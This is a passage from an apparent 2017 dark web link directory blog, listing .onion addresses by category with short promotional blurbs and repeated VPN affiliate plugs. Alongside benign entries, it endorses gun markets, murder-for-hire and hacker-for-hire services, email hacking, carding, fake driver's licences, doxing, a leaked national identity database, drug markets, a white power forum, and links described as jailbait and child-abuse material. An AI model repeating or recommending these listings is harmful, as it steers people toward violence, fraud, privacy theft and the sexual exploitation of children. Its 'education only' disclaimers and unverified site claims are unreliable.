+http://663wbgqczxp445am.onion/ – Movie/Music/Radio – Index of/: This deep web links offered FTP based directory access and listed directory have great amount music tracks collection and all are sorted according to alphabets, which can help you to find right track quickly. + +http://zohaq6hhk2p52c7d.onion/ – Movie/Music/Radio – Offair Darknet Radio: This dark web links also associated with music, here you can list live streaming music. + +http://kurdox4tfzujxddq.onion/ – Movie/Music/Radio – Radio Jobiwan: If you are still looking radio dark web sites, then you also can try this links, here you can find some tracks, which you can play by the help of front given play button. +NordVPN 2 + +http://76qugq4pb42lpgwx.onion/ – Movie/Music/Radio – Deep Web Radio: This dark web links similar like as upper given site Radio Jobiwan, Here you can can get information about radion information, like how to mount station and station related other information. Deep web Radio also offers anony player service, also providing information how you can configure into your streaming player like as Mplayer or VLC player. + +http://5slxqzbtjz5uu4pt.onion/ – Movie/Music/Radio – AnonUK Radio Network: Another site for radio or music category, this dark web site also offering service globally on the dark web, IF you want to access this radio station and want to listen some UK news then you can visit this site. +Games Deep Web Links 2017 + +http://6lw4pg2wsy475d7q.onion/ – Games – Apophenia: Do you want to something crazy on dark net then this tor directory can help you, here you can win bitcoin by the help of giving simple questions answer. + +http://bettorzztykidrx2.onion – Games – Bettor: This Tor Directory is offering betting service If you like betting on Football, Basketball, Tennis the check out this site and win good amount of BTC. + +http://theches3nacocgsc.onion/ – Games – TheChess: looking some entertaining, and has good knowledge about Chess then this deep web links is only for you, play chess game anonymously with any users. + +http://betcoinahk4j27yb.onion/ – Games – Hidden BetCoin: Do you want to make some fun on the deep web, and looking any type games online. If yes, check out given website links and play casino games. Hope you will enjoy on this website, for more information about games the you also can visit this deep web sites. + +http://5p6dpc344vsbigv7.onion/ – Games – PHDCasino: Do you love casino games and want to play some casino games on the deep web, if yes then this dark web links can offer you some great games information which you can play right now. This website has more than 500+ online casino games. + +Note: I am not recommending you, these type games site may be fake or scam. + +http://rswwpapessp3xxpw.onion/ – Games – Online Shans: +Another deep web links for make fun, but this complete site is written in Russian language, if you know Russian and also interested into casino then this will be good site for you. + +http://bettorzztykidrx2.onion/ – Games – BetTor is leading marketplace for selling winning bets in deepweb! Don’t confuse with the sports predictions; we provide you 100% WINNING BETS in football, basketball or tennis. Hope this deep web links can provide you best winning chance in betting. + +http://grc43ygyy3iy5vxh.onion/ – Games – Killer-GeMex: This deep web sites offer killer Gemex game live console, these type sites is not a good choice to visit because these type dark web sites need your action and action can fall you in danger. + +http://hg5km4y37lgir6r3.onion/ – Games – Euro Buk Simulator 2014: This dark web links still working since from 2014, but now webpage does not have any type information, Only has one hyperlink and given hyperlink also scam. + +http://sntfgwfami5fdbn5.onion/ – Games – Sonic & Tails: Are you aware with Sonic games, If yes and want to play that games on dark web then this dark web sites can help you. Here you can download sonic & tails games into your local computer. + +http://hideout6eiazeoyp.onion – Games – The Hideout: Another dark web links which are related to games, but this site also offers anonymous chat service, if you want to make some fun right now then visit here. + +http://hzssn2ryi3hj7tah.onion/ – Games – Deep Web Games Stop: Do you love games and always interested in new games and want to buy then this deep web site is a great shop where you can buy latest games into half market price. + +http://hsv47rw3y6r3h5ji.onion/ – Games/Betting – Best Bets: This site only for those type person who are interested into betting, If you are? Then you can try to visit best bets deep web links. + +http://ghostbookdoyyvrs.onion/ – Games/Betting – Ghost Books: This is very popular deep web sites, where you can find bettings related service, but according to site visit, Site offering bettings on then Football, South Korean football, politics, united states. + +http://fixedlwgc3burzts.onion/ – Games/Betting – European Leagues Fixed Matches: Do you believe into just in make money and also interested into betting the this deep web links can help you, because this site offers fixed matches information. According to site, they are not offering information after analyze, but they will share internal information. + +http://wvxwdchqvprqfkl4.onion/ – Games – Lucky Bitcoins: Another gambling deep web sites, here you can win 2.4 BTC, According to website, here you can play by very tiny amount of bitcoins and tip number 1 to 10 then you may win!!. + +http://torbet777o4era3q.onion/ – Games – TorBet777: This is very interesting sites, I am saying this thing because, website saying Bet While Viewing Sexy Photos Totally Anonymous, means you may win money via only view sexy photos. Look like pretty cool.” + +http://bet4winf2rjaitd4.onion/ – Games/Betting – Bet4win: Similar websites like as fixed matches, here you can get winner team information, by which you can make huge amount of money by bettings. They are offering information about Soccer, football, boxing and etc. + +http://3r7ailix2glqhrwb.onion/ – Game – Another alternative betting dark web links which offering information about football winner teams. If you are interested into these type information and want to win big amount of money then you can visit this deep web links. + +Deep web links | Deep web sites | The Deepweb 2017 | The Hidden Wiki url +ddwan51 +Weapons, Hack, Phreak, Anarchy (internet), Warez, Virus, Crack Deep Web Links + +Every day, darknet got more than thousands of weapons, warez, virus, hacks related deals, and these numbers still growing day to day. I am sure if you are here, you already looking some good deep web links which offering such type services (Weapons, Hack, Phreak, Anarchy (internet), Warez, Virus). bellow I am giving you, these type best darknet markets which are trusted and some people already dealing with these hidden wiki sites. + +Warnings: You are not safe if you are browsing deep web sites without VPN Software. For very best anonymity and complete security always use NordVPN with Tor Over Server with Tor Browser. If you are thinking Tor Browser provides you total security, you are totally wrong. Tor Browser doesn’t provide you best anonymity and complete security.To browse safely always run NordVPN with Tor Browser before accessing any deep web link. + +http://gunsjmzh2btr7lpy.onion/ – Weapons – Guns Dark Markets: This deep web markets having good no of gun or any other weapons-related listings. Available some major categories are Pistols, Assault Weapons, Full Auto Rifles, Submachine Guns, Sniper Rifles, Grenade Launchers and etc. + +http://gunsdtk47tolcrre.onion/ – Weapons – UK Guns and Ammo Stores: Available products are Glock 19, Walther P99, Bullets for Glock 19, Walther P99 + +http://g4r2pz2r22ztdcsm.onion – Weapons – Black Markets: If you are looking something big into weapons categories then checkout this darknet market, here you can find best weapons, drugs, Counterfeit, Fake cards and many more. + +http://2kka4f23pcxgqkpv.onion/ – Weapons – EuroGun: when I visited this deep web links, I saw 3 listed product here which are Walther PPK, Kal.7,65; Desert Eagle IMI, Kal.44; SIG Sauer P226 AL SO DAO, Kal. 9mm, If you looking both type guns then checkout this hidden deep website. +NordVPN 2 + +http://mke3j4vlpo3ccmu4.onion/ – Weapons/Services – Russian Mafia: This deep web sites offering killing, hitting, beating and contract higring for murders services, if you are looking such type services then Russian mafia is the best place for you. + +http://armoryx7kvdq3jds.onion – Weapons – TheArmory: This deep web links having great amount of weapons-related listings, I think if you looking big guns market then this may prove best alternative for you, available major categories are Pistols, Rifles, Shotguns, Military, Police, Armor and etc. + +http://7p4phtqnrzrg5ju5.onion/ – Weapons – BlackGhost East Europe Stuff: This is another place where you can buy Guns, Mainly I saw here AK 47 Russian Guns, If you want to buy AK 47 then visit here. + +http://dtkeubgx47jeqvag.onion/ – Weapons – Best Gun Market: This website having more than 1000+ listed products and all are military grade weapons. + +http://vi5ydynhfco62g4v.onion/ – Weapons – Glock’s & Taurus: looking some great small pistols for your personal use, this deep web site having more than 25+ alternatives and all are well-known products. + +http://iir4y0mndw2dec7x.onion/planet – CardersPlanet First carding service from russian community. Credit cards, bank accounts, DDoS servicedeep web links + +Commercial Service Marketplace Hidden Wiki Tor Onion Directories + +If you are looking commercial marketplace tor directory links then check out bellow given deep web links, these links having some very popular hidden wiki sites like Anonymous forum, Amazon deep web sites, Hidden BitCoin marketplace, Sheep Marketplace and many other tor hidden deep web links. Hope these links will prove helpful for you. + +Note: I am not recommending you, visit these websites, I only add these sites here for education purpose or freedom information, this is total on your risk, but I am recommending you here before visit any deep website make sure focus on your privacy Security. + +Recommended: For better security use NordVPN Tor Over Server + Tor Browser. ( Always run both software before access hidden Internet) + +http://oiiuv2gwl2jhvg3j.onion/ – Service/Killer/Hacker – BesaMafia: Do you want to Hire Killer or Hacker then check out this deep web sites. + +http://bjjkaebas6uywama.onion/ – Service/Cards/Gadgets – CuberFreak Card the World: By the help of This tor directory you can buy Any major gadgets and Gifts cards related to any major sites like Amazon, Ebay. + +Note: Service available in all world. + +http://eqnbwy4b4k4lrlq5.onion/ – Service/Cards – This deep web site provides unique service, I mean here you can check your card validity + +http://dugonj4mglbrusq6.onion/ – Service/Finance – Safe Pay BTC: This deep web sites offering you with a way to pay for your online transactions without worry. His per transaction fee is 1.5% +NordVPN 2 + +http://edsec5zn26zqjwry.onion/ – Service – Edsec: This is Edsec portfolio website, if you want to hire any security or hacking specialist, Edsec provide both type service on best price. + +http://en35tfp3p3a4wqwb.onion/ – Services/IDCards – USFakeID: Do you want to make your US Driving License Card then check out this website, here you can find all US states fake driving license service. + +http://doxtorg7natnwyz5.onion/ – Service – The Doxtors Service: If you want to here any Dostor for Doxing then check out this hidden deep web links. + +http://agenttoe2dlvxdei.onion/ – Service – Agento Service deep web links is give a chance to investigate anyone or hack any email with in very short time, If you are looking these type service Like Traveling Internationally+Stay, Private Investigation, Life Ruining, Email Hacking, then you can try this onion directory. + + Tech Gadgets Deep Web Store + +If you like latest gadgets and want to buy these gadgets by BTC then you can use any bellow deep web links, bellow given gadget stores tor links are self hosted, before buy gadgets make sure check store policy and reviews. I have added all working links deep web store. + +Note: My purpose to share this information is to provide information only for education purpose. I am not recommending you in anyway visiting these deep web sites. Access these deep web sites at own your risk. I recommend you to double check your privacy security setting before visiting deep web links / dark web sites. + +Warning: Don’t trap into false sense, Tor Browser doesn’t offer you complete privacy safety. To maximize your privacy security and anonymity, always run NordVPN software with Tor Browser before accessing deep web sites. + +http://akvilonom27p5hvb.onion/ – Gadgets – If you want to but any electronic gadgets like Tab, Laptop, Smartphone, Computer and etc, then this deep web sites will proving helpful for you. + +http://atlas777hhh7mcs7.onion/ – Technology/Others – Atlas: This is a web application program by which you can know about currently running relay, and running port. +NordVPN 2 + +http://amazonfkuuy6g3ou.onion/apple-phones.php – Gadgets – DeepTech: If you love gadgets then you also love this deep web gadgets store, here you can buy Apple iPhone, Tab, Mackbook, Computer, Laptop, Camera and many other things. + +http://35flmpspwpnarbos.onion/ – Gadgets – Appleworld: This darknet sites having largest amount of listed products like iPhone, iPad, Macbooks, iMacs and others. + +http://ljekq2ejc62q76dy.onion/ – Gadgets – iStore: This is another deep web links which having latest Gadgets which you can buy via BTC. + +Non-English Deep Web Links: +Czech / Cetina + +http://qyy2n2lqpc5l524q.onion/ – PirateLeaks.cz – Czech website based on Wikileaks +Top of Page +Danish / Dansk + +http://oj3nqbmyudyl4mgn.onion/ – DanishChan – This focused on Imageboard and these boards are well managed and categorized according to category + +http://4eiruntyxxbgfv7o.onion/snapbbs/43f25a73/ – Danish Drug Trade +Dutch / Nederlands + +http://ie4hf3qxzoazywoi.onion/ – Voetbalfan +Finnish / Suomi + +http://zitanihpqsvi2lav.onion/ – Sipulilauta | A chan +http://zqiiraewuapgbsos.onion/ – Thorlauta | Successor to Torlauta +http://xxieg3mbvoh26pvs.onion/ – Blue Quarters | Advice regarding to BitCoins, Silk Road Online, ordering anonymously, staying anonymous in deepweb etc +http://r33rs4kqbjvdxuk2.onion/ – Blue Quarters Forum | Discussion forum +http://v7ovl2hciwt72lqi.onion/forum/ – Suojeluskunta | White Power Forum +French / Français: + +http://l4tay4mx3vyjdn4i.onion/ – Je suis Kalila | Weird website +German / Deutsch: + +http://6jzwxsoxmlefkkkl.onion/ – Das ist DEUTSCHLAND hier | discussion forum with no specific topic +http://7pwhaqsxbjdj27gx.onion/ – TAZ Archiv | A daily updated archive of the TAZ (German newspaper) starting from 2009-05 maybe with some days missing +http://7ymfzygewl4n6usp.onion/phpBB3/index.php – Hmm? | Forum for warez and uncensored talk +http://ar3ubs6cg6an4ylt.onion/ – beaglesnoop German tor blogs for hidden news +http://deurfnquin7mvni2.onion/ – Pyrowiki | Pyrotechnics and drug wiki +http://j4ddjgxetfx2ybcx.onion/ – Geheimkanal | Imageboard. (Partially 18+) +http://qdsuildbdofkrhe3.onion/ – Safety101 | Computer saftey board. Some English +http://jbsex4wngjpo5i27.onion/ – Jailbait Sex Forum | Jailbait Sex Forum +http://torlinq7wg2c3u4w.onion/ – Flachbrustkanal | Brett für flache Brüste +Hebrew + +http://xqz3u5drneuzhaeo.onion/users/samim/ – Samim.onion marketplace for sell and buy drugs in Israel(bitcoin) +NordVPN 2 +Polish / Polski + +http://vjelr2xdaqsgslzr.onion/ – Torowisko | Pilish Forum can access without registration +http://rzb5nlpvy5oqnket.onion/ – Fundacja Panoptykon | Foundation to generalized surveillance, and trends intensification of supervision and control over society +http://2wjsnwzoeiae4iyf.onion/1984_pl/Rok_1984.html – George Orwell | Polish translation of the well-known novel +http://pibn3ueheubjxv2z.onion/wiki/index.php/Start – Polska Ukryta Wiki | Polish Wiki Tor Community +http://uaga3aoawaj6hohg.onion/ – Backup NWO | Collection of most intrested article and News +http://cwesjxczvcvwvapz.onion/ – Ksiega Urantii | Only about true news +http://n2qxamb4ujm53cas.onion/ – Krzysztof Brejza | Interesting Stuff for enjoy +http://qubsrxat5qsaw5u5.onion/ – Polska Cebulka | Polish Network blogs and Deep Web Links Directories +http://ont6bv4bg7rtgaos.onion/ – Polish hidden site on the Tor network +http://nemlq3kd36frgvzp.onion/ – Torkazywarka +http://nemlq3kd36frgvzp.onion/forum/ – Forum about scams , virtually, weapons and hacking +http://xlmg6p4ueely7mhh.onion/ – TorKnight | Polish forum which can access only registred User +http://w56hjpxn45yzohqa.onion/ – 56 Dog Days | Ramblings +http://dts563ge5y7c2ika.onion/Onionsearch/ – Onioon Search | Poland Search engine, and can add your deep web sites links +Slovak / Slovenský + +http://y4bzva6k3l2l7rla.onion/ – Child pornography : It’s just an excuse | Why is the fight against child pornography pretext for something else +Spanish / Español + +http://2dn2dmxt5uwnxz3j.onion/ – Abusos | Abuses in Spanish +http://kd6qr7xh42coxooq.onion/ – T0rtilla | Chat platform in Spanish +http://s6ccouvybf3ysmb2.onion/ – CebollaChan | Tor Spanish collaboration platform +http://xqz3u5drneuzhaeo.onion/users/tortilla/ – T0rtilla | Shoutbox webchat. (Direct FH URL) +http://uqtinqynmibpoa2s.onion/ – Forocoches 2.0 +Swedish / Svenska + +http://fcnwebggxt2d3h64.onion/ – Moral.Nu +http://wd43uqrbjwe6hpre.onion/ – KognitionsKyrkan Spritual Stuff +http://zce2gyru25cvynqc.onion/zg/ – ZG Projektet + +Extra Deep Web Links Updated 2017 + +Here is the list of some popular deep web sites links, which mostly used but not lie into popular categories (like as drugs, blogs, books, weapons, Porn, marketplace). If you are looking these type active deep web links then this section can provide you right information these type links. + +Note: Same as another category, here I also want to say you, bellow given some links also have mind disturbing content, if you not like these type stuff then I am highly recommending you, please don’t visit these given links. All links only for information or research. + +For more security, I you are trying to visit bellow given links then run your NordVPN and connect any server which you like then run your Tor browser, If both are in run mode then you are ready to visit bellow given links. + +Note: If you don’t have NordVPN then buy this great VPN service premium subscription, If you don’t know, how to create secure environment for access the deep web then checkout step by step how to access the deep web guide. + +Let’s have some fun.. + +http://hss3uro2hsxfogfq.onion/news/ – News – Latest Deep web Updates and News, This Tor Link is a Part of notEvil Search Engine. + +http://abigispddied4mec.onion/ – Other – If you are tech savvy person, hope this link is having something useful for you. + +http://tuxwnbupvdnfnwnd.onion/ – Other – The ZeroBin paste encryption service + +http://blkbook3uvmlfmu3.onion/ – Extra – Tor Social Networking Community: Do you want to some fun on deep web then Social sites is a great alternative, for social site community you can sign up on this great deep web social sites. + +http://deadnotejlktdu6u.onion/ – Extra – Dead Note: This Darknet site you can access after sign up. I don’t have this site experience. + +http://76qugh5bey5gum7l.onion/ – Extra – Deep Web Radio: When I visited first time this hidden wiki site. then I didn’t understand how to run this radio vla vla vla vla etc.. Hope you can found something useful here. + +http://qbj5eznyjs5q7rok.onion/ – Extra – DevilFunding: This Deep Web Links can helping to fund, If you have any crazy project ideas, and want to collect some founds then this website will prove helpful for you. + +http://etnkdf2jsvc7vi4u.onion/ – Extra – This site title is “It is a Mystery.” I wasn’t able see anything meaningful on this deep web sites webpage, hope you can see. If you know more information about It is Mystery, then please share with us. + +http://bq6reuo2mxnlf5jb.onion/ – Extra – If you want to see Jackblue Gallery then check out this deep web sites. + +http://u3ghkwxzofgid3vx.onion – Extra/Jobs – Jobs4Hacker: Are you looking some hacker for any task the checkout Jobs4Hacker deep web site, here you can post your Job then after posting any interested hacker can contact you. + +http://papersqqyihp5b6u.onion/ – Extra/Documents – MediaGoblin: when you will visit this hidden internet site, then you can saw here, site has good collection of journals and research paper. If you have interested in these type things, then you can try to visit this site and can read these documents. + +http://anna4nvrvn6fgo6d.onion/ – Extra – Anna is Sad: I think you don’t know deep web also have some sites which offers some funny stuff, but these tor links don’t offer any type funny stuff but if you want to donate some BTC to required person. Hope Anna is the right person but you also can donate me. + +http://kjk4qvgg6usnvwyh.onion/ – Extra/Service – Martin Kapplinger: This is self-service based deep web sites, this site admin name is Martin Kapplinger and he is a software developer, If you need his service any of your developing projects then you can contact him. + +http://kotnikdvbq6lnbfz.onion/ – Extra/Service – Nikola Kotur: Just like as Martin Kapplinger, this website also offer self-service, site admin name is Nikola Kotur, and he is a developer and provides his service on PHP, Python, Pascal programming language. If you are looking any developer from associated technology, then you can contact him. + +http://dweebyhexfberrix.onion/ – Extra/Fun – Dweeb Web: Are you getting bored now and want to make some fun on the deep web then here I am sharing with you one great link which having one funny game. For more information, you need to visit this deep web sites. + +http://syntaxeddtui6zkm.onion/ – Extra – Syntex: I don’t know, this deep web links what is offering and how to deal with this site but I want to say when I visited this site then I saw some horrific images related to suicide, eating disorder, dissociation, self-harm. If you want to more, then you need to visit this deep web sites. + +http://torc5bhzq6xorhb4.onion/ – Extra – Turkish Citizenship Database: Today do you want to something crazy, If yes then I have one deep web links which offer Turkish Citizenship database. If you feel this information you can use user personally or officially on internet then you can try to visit this site. Date have information about National Identifier (TC Kimlik No), First Name, Last Name, Mother’s First Name, Father’s First Name, Gender, City of Birth, Date of Birth, ID Registration City and District, Full Address. + +http://42xlyaqlurifvvtq.onion/ – Extra/Service – EndWare: According to this site, if you still looking developer for your project and want to hire anonymously then EndWare can help you. This self-hosted deep web sites admin name is Endwall, and he developed endware suite, which you can use for anonymity, privacy, and computer security. + +http://riotiakxtodn2gv5.onion/ – Extra/Fun – I love this dark web links because when I visited this site the first time, then I found one skelton dancing on the screen. Which look like so funny.. If you want to see something funny on the deep web, then you should try to visit this hidden wiki site. + +http://youmad6gb7kvr7if.onion/ – Extra/Fun – You are mad: I have one deep web links which also offer some funny thing, hope you will like, I love site music. + +http://wivfwn64tm3uaeig.onion/index.php – Extra – Daniel Kraft’s Website: Another blog which you can find on deep web, this site admin Daniel Kraft’s always share something interesting here, and here you also can find his project document, research paper, blog links and about him information. + +http://darknetco4i4prlp.onion/ – Extra – The Darknet Company: before this time, I didn’t saw this links on deep web, but I found this links on one deep web links directory site and visit here then see, site have only contact form but I don’t know how to use this contact form. If you know, please share with us, we will update for my readers. + +http://psychonaut3z5aoz.onion/wiki/Main_Page – Extra – PsychonautWiki: This is a wiki-based site here you can find information about Psychonautics, Visual effects, Cognitive effects, Miscellaneous effects, Psychedelics, Dissociatives etc. + +http://opalrwf4mzmlfmag.onion/ – Extra – Wow a name: This deep web links related to self-promotion, like site have admin Twitter account links and interesting file links and more. By the help of this menu you can browse available directory and can download available files. + +http://latln6xmsn7pax3v.onion/ – Extra – HBO Go/Now Accounts: This website offer HBO account, If you are interested to buy new HBO access account then you can buy here, per account offer price is $20. + +http://hbooruahi4zr2h73.onion/ – Extra – Hiddenbooru: this is another deep web sites which Information I don’t have, if you want to know more about this site then visit here and type any test into search box and press enter. +NordVPN 2 + +http://thund5izs5eyl254.onion/ – Extra – Penis Enlargement at Thunder place: Every men want’s to increase his penis size and also want to some questions answers related to penis enlargement. If you also have and looking some good deep web links then thunder’s place is best for you. Here you can know everything about penis and also can participate in available thread. This forum have more than of 100 thousands of an active member. Hope you will learn something new here. + +http://oq2pviecmwp4smrj.onion/ – Extra – Benvenuto!: I think this site are written in Italian language; that’s why I can’t tell you more about this deep web sites, if you know Italian then you can visit this site. If you found something interested here, and feel deepwebsiteslinks.com site readers also know then, please share all information about this link via the contact us page. + +http://onionbr5zulufnuj.onion/ – Extra – Onion browser to check: Are you new on deep web, and want to check your Tor browser status. Your browser is connected to the Tor network or not; then you can check your browser connection status with the help of given link. + +http://gfzw3wyc5lzbro4d.onion/ – Extra/News – Pitcairn News: This is deep web news site, which contains information and links about Pitcairn Island, Do you want to know more about Pitcairn Island then you should visit this deep web sites. But this site still not updated from last two year. + +http://sla2tcypjz774dno.onion/18yo.html – Extra/Webcam – According to this deep web links, site owner has accessed his girlfriend bedroom, If you want to also get his girlfriend bedroom access then you can buy here username or password and can watch every day live show. Note: I think this is fake site. + +http://mdj7ldtgoq22m3hi.onion/ – Extra/Chat – According to C4MTOR, This site offer private chat service, If you want to participate into this private chat show, then first your need to pay some BTC in given BTC address then you will get Chat show access username or password. Note: Always beware these type scams. + +http://fuckyouhwlpp3odw.onion/ – Extra – Fuck You: Ha ha ha, it’s such a funny site, when you visit this site then you got “Go Fuck Yourself” message. But without this message side didn’t have any other information. Only time loss site. + +http://gkf352hyigqoan2g.onion/ – Extra – Another extra category site, which also only have status on webpage, and any other information are not available there.. If you know anything about this site please share with us, we will update your information for my site readers. + +http://roewfyjjhvmv6zbu.onion/ – Extra – I don’t know, how we can use this type offer information, I am saying this because when I visited this site, then I saw only some graph, which shows some coordinate and points. + +http://mqqrfjmfu2i73bjq.onion/ – Extra – Tor Kittenz: another anonymous site which doesn’t driving any extra information, when I visited this site, I saw one cat image and after image website also have on link. + +http://dioq2yg3l5ptgpge.onion/index.html – Extra – TheCthulhu Lurks Here: another deep web site which not providing sufficient information about, what is offering? and what you can do with this site? that’s why I also put this site into extra category. but I think this site admin name is Cthulhu Lurks, If you want to contact to Cthulhu Lurks then you can try bellow contact us page link. + +http://njto3uretienojic.onion/ – Extra – Same as upper given deep web link, this site also bot offering information, but only have one image, and image have biohazard symbol. + +http://xpgylzydxykgdqyg.onion/ – Extra – List.Riseupp.net: Do you looking any directory, which provides you all category related to journals and thesis. If you are looking such type dark web links, then visit here. + +http://secushare.cheettyiapsyciew.onion/ – Extra/Social – SecureShare: According to this dark web links “Imagine Facebook, Whatsapp, Gmail and Skype rolled into one, without the centralized surveillance and control. Crazy? Well, it hasn’t been try before, at least not our way. So let’s give it a try.” If you want to know more about this project then you can visit secure share deep web links. + +http://pilletubnarawosh.onion/ – Extra – Private Computer System: This site have some warning information into a webpage. Do you want to get more about this site then you may visit here? + +http://rjzdqt4z3z3xo73h.onion/ – Extra – How will you tell the world: This deep web site have some graphic presentation, like circle rectangle, dots and many more, if you know hoe to use that then you can try to visit this hidden wiki link. + +http://dtt6tdtgroj63iud.onion/ – Extra – Deep web in a Nutshell: For site testing process, I found when I click on given links then every time site will be open on the duplicate page, and domain name should be same which is primary domain, that’s why don’t visit this deep web sites offer links. + +http://allyourkotatxek4.onion/ – Extra/Porn – Another site which has only animated image and one soundtrack which automatically plays we you will visit this dark web links. + +http://lolicore75rq3tm5.onion/ – Extra – Lolicorn: I think this site also offer music-related service, but I don’t know how to use this site because site also has some technical function related commands like ssh access, SFTP, rsync and more. + +http://gac5e64yd3rsdk5n.onion/ – Extra – OTR.im: This website works like a community but only for developers, If you have any open source project and looking some contributor or you also want to contribute in another open source project then this site is right place for you. + +http://bgyar6b644c33joc.onion/ – Extra – Bombagyar! : This is non-English site, I you know anything about this site and want to share your experience here please leave your comment. + +http://data44v2jfxk46ma.onion/ – Extra – Dataleaks: This is unique category website, according to data leaks, If you have dark web market or you want to get high traffic on your website then you can buy his subscription and you can easily can drive huge amount of real users traffic on your deep web sites. + +http://dnjobs7e4z3zt7wa.onion/ – Extra/Job – Darknet Jobs: This deep web links providing service for job consulting, If you are looking jobs into anonymous environment then this website can help you, here you also can post your jobs, for which you want to hire someone. Note: For Payment, you can use BTC. + +http://torsniffrqvvkv4x.onion/ – Extra – TorSniff: Many time you need to check any deep web sites status, means you want to check site is working or not. Now you can check any deep web sites status by the help of TorSniff. Only you need copy your website URL and put into Page URI/URL section, and press check button then holla now result on front of your eyes. + +http://54lnbzjo6xlr4f4j.onion/ – Extra – Tor Project: Do you want to download tor software and want to access Tor Project website into anonymous environment, then this link can help you. This is the link of Tor Project official website which is also hosted on .onion extension web environment. + +http://kmltuigipr23dk3g.onion/ – Extra – Torperf measurements of Tor hidden service: I don’t know what type information offering by this deep web sites, but when I visited this site then I found one graph which have some indication, hope you can find something informative here. + +http://mrlevrrir47hvei5.onion/ – Extra – MrLevRocks: Self-hosted site which admin name is MrLevRocks, he is offering here his project information and his gallery collections. This deep web site also has blog section where you can see some blog post. + +Hosting Service Deep Web Sites Links | Dark Web Links + +Do you want to make your own deep web sites or darknet marketplace and looking some affordable hosting service deep web links for hosting your darknet websites then checkout bellow given hosting deep web links, and buy any efficient plan according to your requirements. I have shared some best anonymous hosting services links, but before buying, make sure to check review of particular hosting service. + +Note: I am not recommending you given deep web links, but before buying hosting service please discuss with hosting service support and also check these service provider reviews. I am only adding these deep web sites links/dark web links here for education purpose.You are accessing any of deep web links is totally on your risk, but I am recommending you here before visiting any darknet links make sure you have run NordVPN. + +Recommended: For very best security and complete anonymity always use NordVPN Tor Over Server + Tor Browser.You are not safe if you are accessing these deep web links without VPN software. + +http://2222zui5d3psp4v5.onion – Hosting – Kowloon Hosting Services: Do you want to make your own the hidden wiki link and looking hosting service then you can try Kowloon, Here you can find multiple plans and can select anyone which is best for you. + +http://prometh5th5t5rfd.onion/ – Hosting – Prometheus Hiddn Service: This Deep web sites offering hosting service, you can buy here VPS and Dedicated hosting and all plans having lot of features, If you want to buy hosting then you can try this hosting service. + +http://hostiysldm5iocpp.onion/ – Hosting – Deep Web Hosting: same as other hosting you can host your website with Deep web hosting. + +http://vilasamxj3nyexl2.onion/ – Hosting – Vilasam Hosting Service: This is another deep web hosting alternative, but mostly time I saw this hosting website down. You can try your luck. + +http://chchchiasaeljqgs.onion/ – Hosting – Chan Hosting: Here you can buy hosting service according to your requirement. This onion site having some great plans. Why are you waiting, choose best suits plan and create your own deep web link. +NordVPN 2 + +http://bitservepd6bbxtq.onion/ – Hosting – BitServer: If you are looking more hosting alternative then BitServer also can prove helpful for you, here you also can buy hosting for your deep web sites. + +http://torhost3p7quiikq.onion/ – Hosting – Tor Hosting: Are you looking some best hosting provider for your .onion site then check out this deep web site, here you can find best hosting packages which you can select any one according to your requirement. + +http://shv34p5cckiljkww.onion/ – Hosting – Hidden Hosting Service: this Deep web sites also offering .onion domain hosting, you can also try this site. Normal Plan offering 20 GB storage, Unlimited Bandwidth, 10+ free onion domains and etc. + +http://mwl3znktk7mqogdv.onion/ – Hosting – Creating Tor Place: If you looking some other hosting alternative then This deep website can help you, + +http://d33pzjppzy7d37r2.onion/ – Hosting – Deep Hosting is trusted deep web hosting service link, here you can find VPS, Dedicated server and VPN service into very cheap price. + +http://mgibojrlzdfoajbn.onion/index.php – Hosting/Service – TorShop: Do you want to make your own deep web store or dark web store then check out this hidden wiki url. + +if you know about any best hosting service deep web links, feel free to share with me, I will be happy to add that deep web links hosting service into this deep web links list. + +Deep Web Books Sites Links + +Do you love books and looking some great resources from deep web then you can checkout this section, inside this category, I am sharing all active and self-tested links. But some time you can face link down problem then you can leave these type deep web links, and also you can report to us by the help of comment section. + +Note: You already know without tor browser, you can’t access the deep web sites. But many times, I saw some given links might offer spam contents that’s why for your privacy security, you should use NordVPN premium services. + +Note: Before access bellow given links, start your VPN software and connect any high-speed server then run tor browsers. If you want to know, how to access the deep web check complete guide post. + +http://mx7rwxcountermqh.onion/ – Books – Bibliomaniac knows your onions: This deep web sites offer onion links server, and all links are serving books, If you love books and always interested into reading books then here you can find some great content. When I visit this dep web sites then I saw, site have more than 50+ active deep web links. + +http://52wdeibt3ivmcapq.onion/ – Books – Liberated books and papers: Do you like reading books and looking some deep web servers where you can find research related documents then today I found one links which offer some great books collection and which you can download into your computer by the help of given hyper links. + +http://akmb7t5w56jcfgwf.onion/ – Books – Tor Service: Are you tech savvy guys and want to read some technical ebooks, for example, books related to programming (HTML, JAVA, Java Script, CGI, ActiveX, Apache Server, etc.). Mostly books from Macmillan Computer Publishing. This deep web links also offer some other stuff which is not browsable at a time when I visited this site. External category is penisology, minet, nude shoots, home porn. + +http://clivl6rf3vft7ihw.onion/ – Books – Non-English: I don’t know anything about this deep web sites, because this is not written in the English language, hope you can find your required stuff on this site. + +http://clockwise3rldkgu.onion/ – Books – Libraries: According to this deep web links, here you can find some good books related content, and also you can download books and can read easily but when I click on given hyperlink then I saw windows same as website http://mx7rwxcountermqh.onion/ + +http://fb2lib3argrtulnw.onion/ – Books – FB2 Lib: Today are you looking some deep web books websites for reading some interesting stuff on hidden internet. Now I have this deep web links which have more than ten language supported books, available books language is Russian, Italian, English, Germany, etc. Total available books 342053, which is huge. Hope you will enjoy something interested here. + +http://flibustahezeous3.onion/ – Books – This deep web sites is look like as another deep web forums, But this forum have some active threads If you are able to understand what is offering? And how to access the offer services then share with us. + +http://hackerw6dcplg3ej.onion/ – Books – Hackerplace: I love this deep web links because this site has big amount of data related to magazine, books, torrents, shops, hacking books and some active dark web links directory. But here I found one problem, If you visit this deep web sites into Tor browser then every time when you click on download button then every links automatically open in Bitly. Which is very irritating and risky for security reasons. + +http://k2r5psouiawfu6jy.onion/ – Books – Index of/: This deep web sites offer directory view but having a lot of content related to videos, books, software, games, music and much more. If you are still finding tech related ebooks then, visit this site and download any required ebooks. + +http://papyrefb2tdk6czd.onion/ – Books – LA RENACIDA BIBLIOTECA DE PAPYREFB2: This site also has big amount of ebook. Available ebooks no are 28086, which is very big, one more thing which I like on this dark web sites, you can find your required book by the help of character filter option. Here only you need to click on relevant character then select your required ebook. + +http://kpynyvym6xqi7wz2.onion/files.html – Books/Documents – ParaZite is a directory, which has a huge number of secret papers and files. By the help of given links, you can access these files and Documents. Main Categories (Porn, Documentaries, History, Hacking, Weapon, Adult, etc.), This site has some illegal stuff like CP related document, Drugs related research papers and much more. Before access ParaZite deep web links, make sure you have double layer security 